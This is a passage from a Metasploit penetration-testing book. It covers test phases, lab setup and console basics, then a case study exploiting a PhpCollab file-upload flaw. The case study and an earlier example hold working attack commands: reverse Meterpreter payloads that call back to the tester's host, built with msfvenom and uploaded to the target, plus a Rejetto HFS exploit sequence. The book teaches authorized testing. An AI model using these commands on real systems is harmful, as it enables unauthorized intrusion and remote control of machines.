Penetration testing is an intentional, authorized attack on a computer-based system carried out to find vulnerabilities and security weaknesses and to certify whether the system is secure. A penetration test advises an organization on its security posture: whether it is vulnerable to an attack, whether the implemented security is enough to resist an invasion, which security controls can be bypassed, and much more. Hence, a penetration test focuses on improving the security posture of an organization.
Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most effective auditing tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, an excellent exploit development environment, information gathering and web testing capabilities, and much more.
This book has been written so that it will not only cover the frontend perspectives of Metasploit, but it will also focus on the development and customization of the framework as well. This book assumes that the reader has basic knowledge of the Metasploit framework. However, some of the sections of this book will help you recall the basics as well.
While covering Metasploit from the very basics to the elite level, we will stick to a step-by-step approach, as shown in the following diagram:
In this chapter, you will learn about the following topics:
- The phases of penetration testing
- The basics of the Metasploit framework
- The workings of Metasploit exploit and scanner modules
- Testing a target network with Metasploit
- The benefits of using databases
- Pivoting and diving deep into internal networks
An important point to take note of here is that we might not become an expert penetration tester in a single day. It takes practice, familiarization with the work environment, the ability to perform in critical situations, and most importantly, an understanding of how we have to cycle through the various stages of a penetration test.
When we think about conducting a penetration test on an organization, we need to make sure that everything is set correctly and is according to a penetration test standard. Therefore, if you feel you are new to penetration testing standards or uncomfortable with the term Penetration Testing Execution Standard (PTES), please refer to http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines to become more familiar with penetration testing and vulnerability assessments. According to PTES, the following diagram explains the various phases of a penetration test:
Refer to the pentest standard website, http://www.pentest-standard.org/index.php/Main_Page, to set up the hardware and the systematic stages to be followed in setting up a work environment.
The very first phase of a penetration test, preinteractions, involves a discussion with the client of the critical factors regarding the conduct of a penetration test on the client's organization, company, institute, or network. This phase serves as the connecting line between the penetration tester, the client, and the client's requirements. Preinteractions help a client gain enough knowledge of what is to be performed over his or her network, domain, or server.
Therefore, the tester serves here as an educator to the client. The penetration tester also discusses the scope of the test, gathers knowledge of all the domains under the scope of the project, and notes any special requirements that will be needed while conducting the test. These requirements include special privileges, access to critical systems, network or system credentials, and much more. The expected positives of the project should also be part of the discussion with the client in this phase. As a process, preinteractions cover some of the following key points:
- Scope: This section reviews the scope of the project and estimates its size. The scope also defines what to include in the test and what to exclude from it. The tester also discusses the IP ranges and domains under the scope and the type of test (black box or white box). In the case of a white box test, the tester discusses the kind of access and required credentials as well; the tester also creates, gathers, and maintains questionnaires for the administrators. The schedule and duration of the test, whether to include stress testing or not, and payment are all included in the scope. A general scope document provides answers to the following questions:
- What are the target organization's most significant security concerns?
- What specific hosts, network address ranges, or applications should be tested?
- What specific hosts, network address ranges, or applications should explicitly NOT be tested?
- Are there any third parties that own systems or networks that are in the scope, and which systems do they hold (written permission must have been obtained in advance by the target organization)?
- Will the test be performed in a live production environment or a test environment?
- Will the penetration test include the following testing techniques: ping sweep of network ranges, a port scan of target hosts, vulnerability scan of targets, penetration of targets, application-level manipulation, client-side Java/ActiveX reverse engineering, physical penetration attempts, social engineering?
- Will the penetration test include internal network testing? If so, how will access be obtained?
- Are client/end user systems included in the scope? If so, how many clients will be leveraged?
- Is social engineering allowed? If so, how may it be used?
- Are Denial of Service (DoS) attacks allowed?
- Are dangerous checks/exploits allowed?
- Goals: This section discusses various primary and secondary objectives that a penetration test is set to achieve. The common questions related to the goals are as follows:
- What is the business requirement for this penetration test?
- Is the test required by a regulatory audit or just a standard procedure?
- What are the objectives?
- Map out vulnerabilities
- Demonstrate that the vulnerabilities exist
- Test the incident response
- Actual exploitation of a vulnerability in a network, system, or application
- All of the above
- Testing terms and definitions: This phase discusses basic terminology with the client and helps the client understand it well
- Rules of engagement: This section defines the time of testing, timeline, permissions to attack, and regular meetings to update the status of the ongoing test. The common questions related to rules of engagement are as follows:
- At what time do you want these tests to be performed?
- During business hours
- After business hours
- Weekend hours
- During a system maintenance window
- Will this testing be done in a production environment?
- If production environments should not be affected, does a similar environment (development or test systems) exist that can be used to conduct the penetration test?
- Who is the technical point of contact?
For more information on preinteractions, refer to: http://www.pentest-standard.org/index.php/File:Pre-engagement.png.
In the intelligence gathering stage, you need to gather as much information as possible about the target network. The target network could be a website, an organization, or even a full-fledged Fortune company. The most important aspect is to gather information about the target from social media networks and to use Google Hacking (a way to extract sensitive information from Google using specialized queries) to find confidential and sensitive information related to the organization to be tested. Footprinting the organization using active and passive attacks can also be an approach.
The intelligence gathering phase is one of the most crucial aspects of penetration testing. Correctly gained knowledge about the target will help the tester simulate appropriate and exact attacks rather than trying every possible attack mechanism, and it will also save a considerable amount of time. This phase can consume 40 to 60 percent of the total testing time, as gaining access to the target depends mainly upon how well the system is footprinted.
A penetration tester must gain adequate knowledge about the target by conducting a variety of scans, looking for open ports, service identification, and choosing which services might be vulnerable and how to make use of them to enter the desired system.
The procedures followed during this phase are required to identify the security policies and mechanisms that are currently deployed on the target infrastructure, and to what extent they can be circumvented.
Here, we will be testing a server to check what level of bandwidth and resource stress it can bear or, in simple terms, how the server responds to a Denial of Service (DoS) attack. A DoS attack, or a stress test, is the name given to the procedure of sending indefinite requests or data to a server to check whether the server handles and responds to all the requests successfully or crashes, causing a DoS. A DoS can also occur if the target service is vulnerable to specially crafted requests or packets. To achieve this, we start our network stress-testing tool and launch an attack towards a target website. However, a few seconds after launching the attack, we see that the server is not responding to our browser and the site does not open. Additionally, a page shows up saying that the website is currently offline. So what does this mean? Did we successfully take out the web server we wanted? Nope! In reality, it is a sign of a protection mechanism set up by the server administrator that sensed our malicious intent of taking the server down and hence banned our IP address. Therefore, we must collect the correct information and identify the various security services at the target before launching an attack.
A better approach is to test the web server from a different IP range. Keeping two to three different virtual private servers for testing may be the right approach. Also, I advise you to test all attack vectors in a virtual environment before launching them at real targets. Proper validation of the attack vectors is mandatory because, if we do not validate them before the attack, they may crash the service at the target, which is not favorable at all. Network stress tests should be performed towards the end of the engagement or in a maintenance window. Additionally, it is always helpful to ask the client to whitelist the IP addresses used for testing.
Now, let's look at a second example. Consider a black box test against a Windows 2012 server. While scanning the target server, we find that ports 80 and 8080 are open. On port 80, we see the latest version of Internet Information Services (IIS) running, while on port 8080, we discover a vulnerable version of the Rejetto HFS server, which is prone to a Remote Code Execution flaw.
However, when we try to exploit this vulnerable version of HFS, the exploit fails. The situation is a typical scenario where the firewall blocks malicious inbound traffic.
In this case, we can simply change our approach to connecting back from the server, which will establish a connection from the target back to our system, rather than us connecting to the server directly. The change may prove to be more successful as firewalls are commonly being configured to inspect ingress traffic rather than egress traffic.
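As a rough sketch of how this switch looks in practice, the following console sequence sets a reverse-connection payload instead of a bind payload. The module path is the real Rejetto HFS exploit module; the IP addresses and ports are purely illustrative:

```
msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) > set RHOST 192.168.10.108
msf exploit(rejetto_hfs_exec) > set RPORT 8080
# A reverse payload makes the target connect back to our machine,
# which a firewall inspecting only ingress traffic often allows
msf exploit(rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
msf exploit(rejetto_hfs_exec) > set LHOST 192.168.10.105
msf exploit(rejetto_hfs_exec) > exploit
```

Here, LHOST is our own address that the compromised server connects back to, rather than us connecting to the server directly.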
As a process, this phase can be broken down into the following key points:
- Target selection: Selecting the targets to attack, identifying the goals of the attack, and the time of the attack.
- Covert gathering: This involves the collection of data from the physical site, the equipment in use, and dumpster diving. This phase is a part of on-location white box testing only.
- Footprinting: Footprinting consists of active or passive scans to identify various technologies and software deployed on the target, which includes port scanning, banner grabbing, and so on.
- Identifying protection mechanisms: This involves identifying firewalls, filtering systems, network- and host-based protections, and so on.
For more information on gathering intelligence, refer to: http://www.pentest-standard.org/index.php/Intelligence_Gathering.
Threat modeling helps in conducting a comprehensive penetration test. This phase focuses on modeling out true threats, their effect, and their categorization based on the impact they can cause. Based on the analysis made during the intelligence gathering phase, we can model the best possible attack vectors. Threat modeling applies to business asset analysis, process analysis, threat analysis, and threat capability analysis. This phase answers the following set of questions:
- How can we attack a particular network?
- To which critical sections do we need to gain access?
- What approach is best suited for the attack?
- What are the highest-rated threats?
Modeling threats will help a penetration tester to perform the following set of operations:
- Gather relevant documentation about high-level threats
- Identify an organization's assets on a categorical basis
- Identify and categorize risks
- Map threats to the assets of a corporation
Consider a black box test against a company's website. Here, information about the company's clients is the primary asset. It is also possible that transaction records are stored in a different database on the same backend. In this case, an attacker can use the threat of a SQL injection to step over to the transaction records database; hence, the transaction records are the secondary asset. Having assessed the impact, we can map the risk of a SQL injection attack to these assets.
Vulnerability scanners such as Nexpose and the Pro version of Metasploit can help model threats precisely and quickly by using the automated approach. Hence, it can prove to be handy while conducting extensive tests.
For more information on the processes involved during the threat modeling phase, refer to: http://www.pentest-standard.org/index.php/Threat_Modeling.
Vulnerability analysis is the process of discovering flaws in a system or an application. These flaws can vary from a server to the web applications, from insecure application design to vulnerable database services, and from a VOIP-based server to SCADA-based services. This phase contains three different mechanisms, which are testing, validation, and research. Testing consists of active and passive tests. Validation consists of dropping the false positives and confirming the existence of vulnerabilities through manual validations. Research refers to verifying a vulnerability that is found and triggering it to prove its presence.
For more information on the processes involved during the vulnerability analysis phase, refer to: http://www.pentest-standard.org/index.php/Vulnerability_Analysis.
The exploitation phase involves taking advantage of the previously discovered vulnerabilities. This stage is the actual attack phase. In this phase, a penetration tester fires up exploits at the target vulnerabilities of a system to gain access. This phase is covered heavily throughout the book.
The post-exploitation phase is the latter phase of exploitation. This stage covers various tasks that we can perform on an exploited system, such as elevating privileges, uploading/downloading files, pivoting, and so on.
For more information on the processes involved during the exploitation phase, refer to: http://www.pentest-standard.org/index.php/Exploitation. For more information on post-exploitation, refer to: http://www.pentest-standard.org/index.php/Post_Exploitation.
Creating a formal report of the entire penetration test is the last phase to conduct while carrying out a penetration test. Identifying key vulnerabilities, creating charts and graphs, recommendations, and proposed fixes are a vital part of the penetration test report. An entire section dedicated to reporting is covered in the latter half of this book.
For more information on the processes involved during the reporting phase, refer to: http://www.pentest-standard.org/index.php/Reporting.
Before jumping in, it is worth asking a few questions about the work environment:
- How well is your test lab configured?
- Are all the required tools for testing available?
- How good is your hardware to support such tools?
Before using Metasploit, we need to have a test lab. The best idea for setting up a test lab is to gather different machines and install different operating systems on them. However, if we only have a single device, the best idea is to set up a virtual environment.
Virtualization plays an essential role in penetration testing today. Due to the high cost of hardware, virtualization is a cost-effective choice for penetration testing. Emulating different operating systems under the host operating system not only saves you money but also cuts down on electricity and space. Furthermore, setting up a virtual penetration test lab prevents any modifications to the actual host system and allows us to perform operations in an isolated environment. A virtual network allows network exploitation to run in an isolated network, thus preventing any modification to, or the use of, the network hardware of the host system.
Moreover, the snapshot feature of virtualization helps preserve the state of the virtual machine at a particular point in time. This feature proves to be very helpful, as we can compare or reload a previous state of the operating system while testing a virtual environment without reinstalling the entire software in case the files are modified after attack simulation.
Virtualization expects the host system to have enough hardware resources, such as RAM, processing capabilities, drive space, and so on, to run smoothly.
For more information on snapshots, refer to: https://www.virtualbox.org/manual/ch01.html#snapshots.
You can always download pre-built VMware and VirtualBox images for Kali Linux here: https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/.
To create a virtual environment, we need virtual machine software. We can use either of the two most popular options: VirtualBox and VMware Workstation Player. So, let's begin the installation by performing the following steps:
- Download VMware Workstation Player (https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/14_0) and set it up for your machine's architecture.
- Run the setup and finalize the installation.
- Download the latest Kali VM Image (https://images.offensive-security.com/virtual-images/kali-linux-2017.3-vm-amd64.ova)
- Run the VM Player program, as shown in the following screenshot:
- Next, go to the Player tab and choose File | Open.
- Browse to the extracted *.ova file for Kali Linux and click Open. We will be presented with the following screen:
- After a successful import, we can see the newly added virtual machine in the list of virtual machines, as shown in the following screenshot:
- Next, we just need to start the operating system. The good news is that the pre-installed VMware image of Kali Linux ships with VMware Tools, which makes features such as drag and drop, mounting shared folders, and so on available on the fly.
- The default credentials for Kali Linux are root:toor, where root is the username and toor is the password.
For the complete persistent install guide on Kali Linux, refer to: https://docs.kali.org/category/installation. To install Metasploit through the command line in Linux, refer to: http://www.darkoperator.com/installing-metasploit-in-ubunt/. To install Metasploit on Windows, refer to an excellent guide here: https://www.packtpub.com/mapt/book/networking_and_servers/9781788295970/2/ch02lvl1sec20/installing-metasploit-on-windows.
Since we have recalled the essential phases of a penetration test and completed the setup of Kali Linux, let's talk about the big picture; that is, Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid the penetration tester. Metasploit was created by H.D. Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a lot of exploits, payloads, encoding techniques, and loads of post-exploitation features.
Metasploit comes in various editions, as follows:
- Metasploit Pro: This version is a commercial one and offers tons of great features, such as web application scanning and exploitation and automated exploitation, and it is quite suitable for professional penetration testers and IT security teams. The Pro edition is primarily used for professional, advanced, and large penetration tests and enterprise security programs.
- Metasploit Express: The Express edition is used for baseline penetration tests. Features in this version include smart exploitation, automated brute forcing of credentials, and much more. This version is quite suitable for IT security teams in small- to medium-sized companies.
- Metasploit Community: This is a free edition with reduced functionalities of the express version. However, for students and small businesses, this version is a favorable choice.
- Metasploit Framework: This is a command-line edition with all the manual tasks, such as manual exploitation, third-party import, and so on. This version is suitable for developers and security researchers.
Throughout this book, we will be using the Metasploit Community and Framework editions. Metasploit also offers various types of user interfaces, as follows:
- The GUI interface: The GUI has all the options available at the click of a button. It is user-friendly and helps provide cleaner vulnerability management.
- The console interface: This is the preferred interface and the most popular one as well. This interface provides an all-in-one approach to all the options offered by Metasploit. This interface is also considered one of the most stable interfaces. Throughout this book, we will be using the console interface the most.
- The command-line interface: The command-line interface is the most powerful interface. It supports everything from launching exploits to activities such as payload generation. However, remembering every command while using the command-line interface is a difficult job.
- Armitage: Armitage by Raphael Mudge added a cool hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortana scripting language. An entire chapter is dedicated to Armitage and Cortana in the latter half of this book.
For more information on the Metasploit community, refer to: https://blog.rapid7.com/2011/12/21/metasploit-tutorial-an-introduction-to-metasploit-community/.
After setting up Kali Linux, we are now ready to perform our first penetration test with Metasploit. However, before we start the test, let's recall some of the essential functions and terminologies used in the Metasploit framework.
After we run Metasploit, we can list all the useful commands available in the framework by typing help or ? in the Metasploit console. Let's recall the basic terms used in Metasploit, which are as follows:
- Exploits: This is a piece of code that, when executed, will exploit the vulnerability of the target.
- Payload: This is a piece of code that runs at the target after successful exploitation. It defines the actions we want to perform on the target system.
- Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more.
- Encoders: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.
- Meterpreter: Meterpreter is a payload that uses in-memory DLL injection stagers. It provides a variety of functions to perform at the target, which makes it a popular choice.
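To see how a few of these pieces fit together, here is a minimal, hypothetical console sequence; the module path is a real auxiliary scanner shipped with Metasploit, while the target address is a placeholder:

```
msf > search portscan                      # find a particular module
msf > use auxiliary/scanner/portscan/tcp   # select an auxiliary module
msf auxiliary(tcp) > set RHOSTS 192.168.10.108   # set a value for an option
msf auxiliary(tcp) > run                   # auxiliary modules are launched with run
msf auxiliary(tcp) > back                  # unselect the module and move back
```

An exploit module would follow the same pattern, with set payload choosing the code to run after exploitation and exploit instead of run to launch it.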
Now, let's recall some of the basic commands of Metasploit that we will use in this chapter. Let's see what they are supposed to do:

- use: To select a particular module to start working with
- show: To see the list of available modules of a particular type (for example, show payloads)
- set: To set a value to a particular object
- setg: To set a value to a particular object globally, so the value does not change when a module is switched
- run: To launch an auxiliary module after all the required options are set
- exploit: To launch an exploit
- back: To unselect a module and move back
- info: To list the information related to a particular exploit/module/auxiliary
- search: To find a particular module
- check: To check whether a particular target is vulnerable to the exploit or not
- sessions: To list the available sessions
Let's have a look at the basic Meterpreter commands as well:

- sysinfo: To list the system information of the compromised host
- ifconfig: To list the network interfaces on the compromised host
- arp: To list the IP and MAC addresses of hosts connected to the target
- background: To send an active session to the background
- shell: To drop a cmd shell on the target
- getuid: To get the current user's details
- getsystem: To escalate privileges and gain SYSTEM access
- getpid: To get the process ID of the Meterpreter access
- ps: To list all the processes running on the target
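As an illustrative refresher, a typical post-exploitation sequence chains several of these commands together (output omitted; the exact results depend on the compromised host):

```
meterpreter > sysinfo        # OS, hostname, and architecture of the compromised host
meterpreter > getuid         # which user are we currently running as?
meterpreter > getsystem      # attempt to escalate privileges to SYSTEM
meterpreter > ps             # list running processes on the target
meterpreter > background     # park the session and return to the msfconsole prompt
```

Backgrounding a session keeps the access alive while we run other modules; sessions in the console lists it again when we want to resume.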
Since we have now recalled the basics of Metasploit commands, let's have a look at the benefits of using Metasploit over traditional tools and scripts in the next section.
If you are using Metasploit for the very first time, refer to https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/ for more information on basic commands.
Before we jump into an example penetration test, we must know why we prefer Metasploit to manual exploitation techniques. Is this because of a hacker-like Terminal that gives a pro look, or is there a different reason? Metasploit is a preferable choice when compared to traditional manual techniques because of specific factors that are discussed in the following sections.
One of the top reasons why one should go with the Metasploit framework is because it is open source and actively developed. Various other highly paid tools exist for carrying out penetration testing. However, Metasploit allows its users to access its source code and add their custom modules. The Pro version of Metasploit is chargeable, but for the sake of learning, the community edition is mostly preferred.
Using Metasploit is easy. However, here, ease of use refers to the natural naming conventions of its commands. Metasploit offers excellent comfort while conducting a massive network penetration test. Consider a scenario where we need to test a network with 200 systems. Instead of checking each system one after the other, Metasploit can examine the entire range automatically. Using parameters such as subnet and Classless Inter-Domain Routing (CIDR) values, Metasploit tests all the systems for the vulnerability, whereas, using manual techniques, we might need to launch the exploits onto 200 systems one by one. Therefore, Metasploit saves a significant amount of time and energy.
Most importantly, switching between payloads in Metasploit is easy. Metasploit provides quick access to change payloads using the set payload command. Therefore, turning Meterpreter or shell-based access into a more specific operation, such as adding a user or getting remote desktop access, becomes easy. Generating shellcode to use in manual exploits also becomes easy using the msfvenom application from the command line.
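Scanning a whole range in one go can be sketched as follows. The SMB version scanner is a real Metasploit auxiliary module; the CIDR range and thread count are example values chosen for illustration:

```
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.1.0/24   # every host in the /24 range
msf auxiliary(smb_version) > set THREADS 20              # probe hosts in parallel
msf auxiliary(smb_version) > run
```

The same RHOSTS option accepts single addresses, ranges such as 192.168.1.10-50, and CIDR notation, which is what makes large-scale testing practical.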
Metasploit is also responsible for making a much cleaner exit from the systems it has compromised. A custom-coded exploit, on the other hand, can crash the system while exiting its operations. Making a clean exit is indeed an essential factor in cases where we know that the service will not restart immediately.
Consider a scenario where we have compromised a web server, and while we were making an exit, the exploited application crashed. The next scheduled maintenance window for the server is 50 days away. So, what do we do? Shall we wait for the next 50-odd days for the service to come up again so that we can exploit it again? Moreover, what if the service comes back after being patched? We could only end up kicking ourselves. This also shows a clear sign of poor penetration testing skills. Therefore, a better approach would be to use the Metasploit framework, which is known for making much cleaner exits, as well as offering tons of post-exploitation functions, such as persistence, that can help maintain permanent access to the server.
Metasploit offers friendly GUI and third-party interfaces, such as Armitage. These interfaces tend to ease the penetration testing projects by providing services such as easy-to-switch workspaces, vulnerability management on the fly, and functions at a click of a button. We will discuss these environments more in the later chapters of this book.
Having recalled the basics of Metasploit, we are all set to perform our first penetration test with Metasploit. Consider an on-site scenario where we are asked to test an IP address and check whether it's vulnerable to an attack. The sole purpose of this test is to check whether all the proper security controls are in place. The scenario is quite straightforward. We presume that all the pre-interactions have been carried out with the client and that the actual testing phase is about to start.
Please refer to the Revisiting the case study section if you want to perform the hands-on alongside reading the case study, as this will help you emulate the entire case study with exact configuration and network details.
As discussed earlier, the gathering intelligence phase revolves around collecting as much information as possible about the target. This includes performing active and passive scans, which include port scanning, banner grabbing, and various other scans. The target under the current scenario is a single IP address, so here, we can skip gathering passive information and can continue with the active information gathering methodology only.
Let's start with the footprinting phase, which includes port scanning, banner grabbing, ping scans to check whether the system is live or not, and service detection scans.
To conduct footprinting and scanning, Nmap proves to be one of the finest tools available. Reports generated by Nmap can be easily imported into Metasploit. Moreover, Metasploit has inbuilt Nmap functionality, which can be used to perform Nmap scans from within the Metasploit framework console and store the results in the database.
Refer to https://nmap.org/bennieston-tutorial/ for more information on Nmap scans. Refer to an excellent book on Nmap at: https://www.packtpub.com/networking-and-servers/nmap-6-network-exploration-and-security-auditing-cookbook.
It is always a good approach to store results automatically as you conduct a penetration test. Making use of databases will help us build a knowledge base of the hosts, services, and vulnerabilities in the scope of a penetration test. To achieve this functionality, we can use databases in Metasploit. Connecting a database to Metasploit also speeds up searching and improves response time. The following screenshot depicts a search when the database is not connected:
We saw in the installation phase how we can initialize and start the database for Metasploit. To check whether Metasploit is currently connected to a database, we can simply type the db_status command, as shown in the following screenshot:
There might be situations where we want to connect to a separate database rather than the default Metasploit database. In such cases, we can make use of the db_connect command, as shown in the following screenshot:
To connect to a database, we need to supply a username, password, host, and port, along with the database name, to the db_connect command.
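As a sketch, db_connect takes a connection string in the user:pass@host:port/database format (all values here are illustrative):

```
msf > db_connect msf:s3cr3t@127.0.0.1:5432/msf_database
```

If the credentials and database exist, Metasploit reports a successful connection, and db_status will show the connected database.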
- db_connect: This command is used to interact with databases other than the default one
- db_export: This command is used to export the entire set of data stored in the database for the sake of creating reports or as an input to another tool
- db_nmap: This command is used for scanning the target with Nmap, and storing the results in the Metasploit database
- db_status: This command is used to check whether database connectivity is present or not
- db_disconnect: This command is used to disconnect from a particular database
- db_import: This command is used to import results from other tools such as Nessus, Nmap, and so on
- db_rebuild_cache: This command is used to rebuild the cache if the earlier cache gets corrupted or is stored with older results
When starting a new penetration test, it is always good to separate previously scanned hosts and their respective data from the new pentest so that they don't get merged. We can do this in Metasploit before starting a new penetration test by making use of the
workspace command, as shown in the following screenshot:
To add a new workspace, we can issue the
workspace -a command, followed by an identifier. We should use the name of the organization currently being evaluated as the identifier, as shown in the following screenshot:
We can see that we have successfully created a new workspace using the
-a switch. Let's switch the workspace by merely issuing the
workspace command followed by the workspace name, as shown in the preceding screenshot. Having the workspace sorted, let's quickly perform a Nmap scan over the target IP and see if we can get some exciting services running on it:
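The steps above can be sketched as follows (the workspace name NetScan2018 is illustrative):

```
msf > workspace -a NetScan2018   # create a new workspace
msf > workspace NetScan2018      # switch to it
msf > workspace                  # list workspaces; * marks the active one
```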
The scan results are frankly heartbreaking. No services are running on the target except on port 80.
By default, Nmap scans only the top 1000 ports. We can use the
-p- switch to scan all 65,535 ports.
Since we are connected to the Metasploit database, everything we examine gets logged to the database. Issuing the
services command will populate all the scanned services from the database. Also, let's perform a version detection scan through
db_nmap using the
-sV switch, as shown in the following screenshot:
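A sketch of the scan and database commands involved:

```
msf > db_nmap -sV 192.168.174.132   # version detection scan; results are logged to the database
msf > services                      # list the services harvested into the database
```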
The previous Nmap scan found port
80 and logged it in the database. However, the version detection scan found the service running on port
80, which is Apache 2.4.7 Web Server, found the MAC address and the OS type, and updated the entry in the database, as shown in the preceding screenshot. Since gaining access generally requires an exploit matching the exact version of the software, it's always good to double-check the version information. Metasploit contains an inbuilt auxiliary module for HTTP version fingerprinting. Let's make use of it, as shown in the following screenshot:
To launch the
http_version scanner module, we issue the
use command followed by the path of the module, which in our case is
auxiliary/scanner/http/http_version. All scanning-based modules have the
RHOSTS option to incorporate a broad set of IP addresses and subnets. However, since we are only testing a single IP target, we set
RHOSTS to the target IP address, which is
192.168.174.132 by using the
set command. Next, we just make the module execute using the
run command, as shown in the following screenshot:
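Putting the steps together, the module invocation looks like this:

```
msf > use auxiliary/scanner/http/http_version
msf > set RHOSTS 192.168.174.132
msf > run
```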
This version of Apache is precisely the version we found in the previous Nmap scan. This version of the Apache web server is secure, and no public exploits for it are present at exploit databases such as
0day.today. Hence, we are left with no option other than to look for vulnerabilities in the web application, if there are any. Let's try browsing this IP address and see if we can find something:
After loading the
auxiliary/scanner/http/dir_scanner module, let's provide it with a dictionary file containing a list of known directories by setting the path in the
DICTIONARY parameter. Also, we can speed up the process by raising the THREADS parameter above its default of 1. Let's run the module and analyze the output:
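A sketch of the module setup; the dictionary path is an assumption based on the wordlists shipped with Metasploit, and the thread count is illustrative:

```
msf > use auxiliary/scanner/http/dir_scanner
msf > set RHOSTS 192.168.174.132
msf > set DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt  # assumed path
msf > set THREADS 10   # illustrative thread count
msf > run
```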
The space character between the individual directory entries has yielded a lot of false positives. However, we got a 302 response code from a
phpcollab directory, which indicated that while trying to access
phpcollab directory, the module got a response to redirect (302). The response is interesting; let's see what we get when we try to open the
phpcollab directory from the browser:
Nice! We have a PHP-based application running. Hence, we got a 302 response in the Metasploit module.
From the intelligence gathering phase, we can see that only port
80 is open on the target system, the Apache server itself isn't vulnerable, and it hosts the PhpCollab web application. Trying some random usernames and passwords against the PhpCollab portal yields no success. Even searching Metasploit, we find no modules for PhpCollab:
Let's try searching PhpCollab using the
searchsploit tool from https://exploit-db.com/. searchsploit allows you to easily search all the exploits currently hosted on the Exploit Database website, as it maintains an offline copy of them:
Voila! We have an exploit for PhpCollab, and the good news is that it's already in the Metasploit exploit format.
The application can get compromised if an attacker uploads a malicious PHP file by sending a
POST request to the
/clients/editclient.php?id=1&action=update URL. The code does not validate whether the request originates from an authenticated user. The problematic code is as follows:
From line number 2, we can see that the uploaded file is saved to the
logos_clients directory with the name as
$id followed by the
$extention, which means that since we have
id=1 in the URL, the uploaded backdoor will be saved as
1.php in the logos_clients directory.
For more information on this vulnerability, refer to: https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/.
To gain access to the target, we need to copy this exploit into Metasploit. However, copying external exploits directly into Metasploit's exploit directory is highly discouraged and bad practice, since you will lose the modules on every update. It's better to keep external modules in a generalized directory rather than Metasploit's
modules directory. However, the best possible way to keep the modules is to create a similar directory structure elsewhere on the system and load it using the
loadpath command. Let's copy the found module to some directory:
Let's create the directory structure, as shown in the following screenshot:
We can see that we created a Metasploit-friendly structure in the
MyModules folder, which is
modules/exploits/nipun, and moved the exploit into the directory as well. Let's load this structure into Metasploit as follows:
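The directory layout can be recreated with standard shell commands; the MyModules/modules/exploits/nipun path mirrors the chapter's structure, and the module file name is illustrative:

```shell
# Recreate Metasploit's modules/exploits hierarchy outside the framework tree.
MODDIR="$HOME/MyModules/modules/exploits/nipun"
mkdir -p "$MODDIR"

# Copy the downloaded exploit into place (uncomment and adjust the file name):
# cp phpcollab_upload.rb "$MODDIR/"

# Show the resulting structure.
ls -R "$HOME/MyModules"
```

Inside msfconsole, loadpath followed by the path to the modules directory (for example, /root/MyModules/modules) registers the new tree, after which the module appears under exploits/nipun.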
We have successfully loaded the exploit into Metasploit. Let's use the module, as shown in the following screenshot:
The module requires us to set the address of the remote host, remote port, and the path to the PhpCollab application. Since the path (
TARGETURI) and the remote port (
RPORT) are already set, let's set
RHOST to the IP address of the target and issue the exploit command:
Voila! We got access to the system. Let's make use of some of the basic post-exploitation commands and analyze the output, as shown in the following screenshot:
As we can see in the preceding screenshot, running the
sysinfo command harvests system information such as the computer name, the OS, the architecture (64-bit), and the Meterpreter version (a PHP-based Meterpreter). Let's drop into a system shell on the compromised host using the
shell command, as shown in the following screenshot:
We can see that as soon as we dropped into a system shell, running commands such as
id shows that our current user is
www-data, which means that to gain complete control of this system, we require root privileges. Additionally, issuing the
lsb_release -a command outputs the OS version with the exact release and codename. Let's take a note of it as it would be required in gaining root access to the system. However, before we move on to the rooting part, let's gain some of the basic information from the system, such as the current process ID using the
getpid command, the current user ID using the
getuid command, the
uuid for the unique user identifier, and the
machine_id, which is the identifier to the compromised machine. Let's run all of the commands we just discussed and analyze the output:
The amount of information we got is pretty straightforward. We have the ID of the current process our Meterpreter is sitting in, the user ID, the UUID, and the machine ID. However, an important thing to note here is that our access is PHP Meterpreter-based, and the limitation of the PHP Meterpreter is that we can't run privileged commands, which are easily provided by more concrete binary Meterpreter shells such as reverse TCP. First, let's escalate to a more concrete shell to gain a better level of access to the target. We will make use of the
msfvenom command to create a malicious payload; we will then upload it to the target system and execute it. Let's get started:
Since our compromised host is running on a 64-bit architecture, we will use the 64-bit version of the Meterpreter, as shown in the preceding screenshot. MSFvenom generates robust payloads based on our requirements. We have specified the payload using the
-p switch, and it is none other than
linux/x64/meterpreter/reverse_tcp. This payload is the 64-bit Linux-compatible Meterpreter payload which, once executed on the compromised system, will connect back to our listener and provide us with access to the machine. Since the payload has to connect back to us, it should know where to connect to. We specify the LHOST and
LPORT options for this very reason, where
LHOST serves as our IP address where our listener is running, and
LPORT specifies the port for the listener. We are going to use the payload on a Linux machine. Therefore, we specify the format (
-f) to be elf, which is the default executable binary format for Linux-based operating systems. The
-b option is used to specify bad characters, which may cause problems in communication and break the shellcode. More information on bad characters and their evasion will follow in the upcoming chapters. Finally, we write the payload to the reverse_connect.elf file.
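The full msfvenom invocation would look something like the following sketch; the LHOST address and LPORT are illustrative and must point at your own listener:

```
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.174.128 LPORT=4444 \
         -f elf -b '\x00' -o reverse_connect.elf
```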
Next, since we already have a PHP Meterpreter access on the machine, let's upload the newly created payload using the
upload command, which is followed by the path of the payload, as shown in the preceding screenshot. We can verify the current path of the upload by issuing the
pwd command, which signifies the current directory we are working with. The uploaded payload, once executed, will connect back to our system. However, we need something on the receiving end as well to handle the connections. Let's run a handler which will handle the incoming connections, as shown in the following screenshot:
We can see that we pushed our PHP Meterpreter session to the background using the
background command. Let's use the
